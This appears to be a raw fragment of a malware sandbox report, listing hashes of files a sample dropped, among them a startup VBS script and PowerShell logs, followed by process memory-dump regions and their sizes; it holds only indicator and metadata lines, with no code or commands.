SHA25632cfb4e83f43787c79ef6a15bef53137a0e9a6d6d558ef1532993fb8369cc8fd
SHA512c1c4e35246c39f3e710cbd261187c7968d75c65fd1c4b96f6caa6ddec1484ca42f2431f4184ec0061cd7b2e0d3478db993f88a043106f0ce9d7ae859c3f5f931
-
C:\Users\Admin\AppData\Roaming\startup_str_510.vbsFilesize
115B
MD594125e81b8ff05b06f78d0620e881b1f
SHA128f48c3cc7f781c20bc8b06c6f98836de810edb4
SHA256204ee9f8232c9b7bc04aef86949cbdf87ca7b81794db76ac42adfe95070be2d4
SHA512aca0a063f0250ed2470d878ae40ba30b06c81918ae85409c643c66a99dcee9420ea6b454c9f8bc7208828752260701af24c708400a526bab7929b68b7c7195c9
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5aa187cac09f051e24146ad549a0f08a6
SHA12ef7fae3652bb838766627fa6584a6e3b5e74ff3
SHA2567036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
SHA512960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2
-
memory/64-149-0x0000029990160000-0x000002999018B000-memory.dmpFilesize
172KB
-
memory/64-156-0x00007FFE599B0000-0x00007FFE599C0000-memory.dmpFilesize
64KB
-
memory/64-155-0x0000029990160000-0x000002999018B000-memory.dmpFilesize
172KB
-
memory/508-160-0x000001F181690000-0x000001F1816BB000-memory.dmpFilesize
172KB
-
memory/620-116-0x000002A4C10C0000-0x000002A4C10EB000-memory.dmpFilesize
172KB
-
memory/620-115-0x000002A4C10C0000-0x000002A4C10EB000-memory.dmpFilesize
172KB
-
memory/620-114-0x000002A4C1090000-0x000002A4C10B5000-memory.dmpFilesize
148KB
-
memory/620-123-0x00007FFE599B0000-0x00007FFE599C0000-memory.dmpFilesize
64KB
-
memory/620-122-0x000002A4C10C0000-0x000002A4C10EB000-memory.dmpFilesize
172KB
-
memory/672-134-0x00007FFE599B0000-0x00007FFE599C0000-memory.dmpFilesize
64KB
-
memory/672-133-0x0000026C265A0000-0x0000026C265CB000-memory.dmpFilesize
172KB
-
memory/672-127-0x0000026C265A0000-0x0000026C265CB000-memory.dmpFilesize
172KB
-
memory/944-145-0x00007FFE599B0000-0x00007FFE599C0000-memory.dmpFilesize
64KB
-
memory/944-144-0x0000024C13640000-0x0000024C1366B000-memory.dmpFilesize
172KB
-
memory/944-138-0x0000024C13640000-0x0000024C1366B000-memory.dmpFilesize
172KB
-
memory/1084-79-0x00000000079C0000-0x0000000007A52000-memory.dmpFilesize
584KB
-
memory/1084-78-0x00000000078B0000-0x000000000791C000-memory.dmpFilesize
432KB
-
memory/1084-82-0x0000000009C10000-0x0000000009C1A000-memory.dmpFilesize
40KB
-
memory/1084-81-0x0000000007D10000-0x0000000007D4C000-memory.dmpFilesize
240KB
-
memory/1084-80-0x0000000007A60000-0x0000000007A72000-memory.dmpFilesize
72KB
-
memory/2412-22-0x00000000077A0000-0x0000000007802000-memory.dmpFilesize
392KB
-
memory/2412-23-0x00000000099D0000-0x0000000009F74000-memory.dmpFilesize
5.6MB
-
memory/2412-1-0x0000000005280000-0x00000000052B6000-memory.dmpFilesize
216KB
-
memory/2412-3-0x0000000005A60000-0x0000000006088000-memory.dmpFilesize
6.2MB
-
memory/2412-77-0x0000000075210000-0x00000000759C0000-memory.dmpFilesize
7.7MB
-
memory/2412-2-0x0000000075210000-0x00000000759C0000-memory.dmpFilesize
7.7MB
-
memory/2412-0-0x000000007521E000-0x000000007521F000-memory.dmpFilesize
4KB
-
memory/2412-4-0x00000000060C0000-0x00000000060E2000-memory.dmpFilesize
136KB
-
memory/2412-5-0x0000000006160000-0x00000000061C6000-memory.dmpFilesize
408KB
-
memory/2412-6-0x00000000061D0000-0x0000000006236000-memory.dmpFilesize
408KB
-
memory/2412-16-0x0000000006240000-0x0000000006594000-memory.dmpFilesize
3.3MB
-
memory/2412-17-0x0000000006750000-0x000000000676E000-memory.dmpFilesize
120KB
-
memory/2412-18-0x00000000067A0000-0x00000000067EC000-memory.dmpFilesize
304KB
-
memory/2412-19-0x0000000007DA0000-0x000000000841A000-memory.dmpFilesize
6.5MB
-
memory/2412-20-0x0000000006D10000-0x0000000006D2A000-memory.dmpFilesize
104KB
-
memory/2412-21-0x0000000002DA0000-0x0000000002DA8000-memory.dmpFilesize
32KB
-
memory/3260-58-0x0000000075210000-0x00000000759C0000-memory.dmpFilesize
7.7MB
-
memory/3260-53-0x0000000007590000-0x0000000007626000-memory.dmpFilesize
600KB
-
memory/3260-49-0x0000000075210000-0x00000000759C0000-memory.dmpFilesize
7.7MB
-
memory/3260-52-0x0000000007380000-0x000000000738A000-memory.dmpFilesize
40KB
-
memory/3260-55-0x0000000075210000-0x00000000759C0000-memory.dmpFilesize
7.7MB
-
memory/3260-51-0x00000000071C0000-0x0000000007263000-memory.dmpFilesize
652KB
-
memory/3260-50-0x0000000075210000-0x00000000759C0000-memory.dmpFilesize
7.7MB
-
memory/3260-48-0x0000000007160000-0x000000000717E000-memory.dmpFilesize
120KB
-
memory/3260-37-0x0000000071030000-0x000000007107C000-memory.dmpFilesize
304KB
-
memory/3260-36-0x0000000007180000-0x00000000071B2000-memory.dmpFilesize
200KB
-
memory/3260-26-0x0000000075210000-0x00000000759C0000-memory.dmpFilesize
7.7MB
-
memory/3260-25-0x0000000075210000-0x00000000759C0000-memory.dmpFilesize
7.7MB
-
memory/3260-54-0x0000000007510000-0x0000000007521000-memory.dmpFilesize
68KB
-
memory/3260-43-0x0000000075210000-0x00000000759C0000-memory.dmpFilesize
7.7MB
-
memory/3612-99-0x00007FFE99930000-0x00007FFE99B25000-memory.dmpFilesize
2.0MB
-
memory/3612-100-0x00007FFE99010000-0x00007FFE990CE000-memory.dmpFilesize
760KB
-
memory/3612-94-0x000001BE72DB0000-0x000001BE72DD2000-memory.dmpFilesize
136KB
-
memory/3612-98-0x000001BE73040000-0x000001BE7306A000-memory.dmpFilesize
168KB
-
memory/4284-104-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4284-110-0x00007FFE99010000-0x00007FFE990CE000-memory.dmpFilesize
760KB
-
memory/4284-102-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4284-103-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4284-109-0x00007FFE99930000-0x00007FFE99B25000-memory.dmpFilesize
2.0MB
-
memory/4284-108-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4284-101-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4284-111-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB